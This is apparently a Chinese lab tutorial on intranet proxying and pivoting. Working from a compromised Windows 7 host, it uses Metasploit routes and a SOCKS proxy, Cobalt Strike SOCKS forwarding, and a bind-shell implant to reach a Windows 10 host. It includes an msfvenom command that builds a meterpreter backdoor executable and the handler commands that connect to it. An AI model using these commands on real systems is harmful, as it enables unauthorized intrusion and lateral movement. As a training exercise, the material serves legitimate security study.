内网安全-代理技术-socket协议

小迪安全网络架构图:

背景:当前获取window7 出网主机的shell。

1.使用msf上线,查看路由

run autoroute -p

添加路由:

run post/multi/manage/autoroute

使用socks模块开启节点,作为流量跳板

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set srvport 1122

srvport => 1122

msf6 auxiliary(server/socks_proxy) > run

使用socket cap 进行代理

2.使用cs进行渗透测试

windwos7上线cs木马

点击代理转发选择socket

输入账户密码后,使用proifixer进行流量转发

配置为目标站点走socket5

3.使用cs进行windows10 上线cs

方案:创建木马将数据传递给本地4444端口

使用window7正向连接目标4444端口

cs配置正向监听器:

生成木马:

模拟执行木马,在windows7交互会话窗口:

connect 192.168.11.129 4444 即可上线

4.使用msf进行windows10 上线

生成正向连接后门:msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=2222 -f exe > bd.exe

放置windows10上运行

msf执行:

msf6 exploit(multi/handler) > use exploit/multi/handler

\*\] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) \> set payload windows/meterpreter/bind_tcp payload =\> windows/meterpreter/bind_tcp msf6 exploit(multi/handler) \> set rhost 192.168.11.129 rhost =\> 192.168.11.129 msf6 exploit(multi/handler) \> set lport 2222 lport =\> 2222 msf6 exploit(multi/handler) \> run

相关推荐
这个人需要休息9 小时前
xss的漏洞类型+dvwa DOM xss各难度的小总结
网络·安全
O***p6049 小时前
区块链在智能合约安全中的审计
安全·区块链·智能合约
世界尽头与你9 小时前
CVE-2014-3566: OpenSSL 加密问题漏洞
网络·安全·网络安全·渗透测试
ZeroNews内网穿透9 小时前
ZeroNews IP 访问控制能力
服务器·网络·网络协议·tcp/ip·安全·web安全·小程序
YJlio9 小时前
[鸿蒙2025领航者闯关] 基于鸿蒙 6 的「隐私感知跨设备办公助手」实战:星盾安全 + AI防窥 + 方舟引擎优化全流程复盘
人工智能·安全·harmonyos
vortex59 小时前
网站压缩包上传解压功能的漏洞剖析
网络·安全·web安全
儒道易行9 小时前
【钓鱼攻防】浅谈exe文件伪造ico图标上线CS远控
网络·安全·web安全
人机与认知实验室12 小时前
香港火灾与人机环境系统安全
安全·系统安全
麦聪聊数据14 小时前
IT 的“控”与业务的“放”:构建基于 Web 原生架构的安全数据共享平台
数据库·sql·安全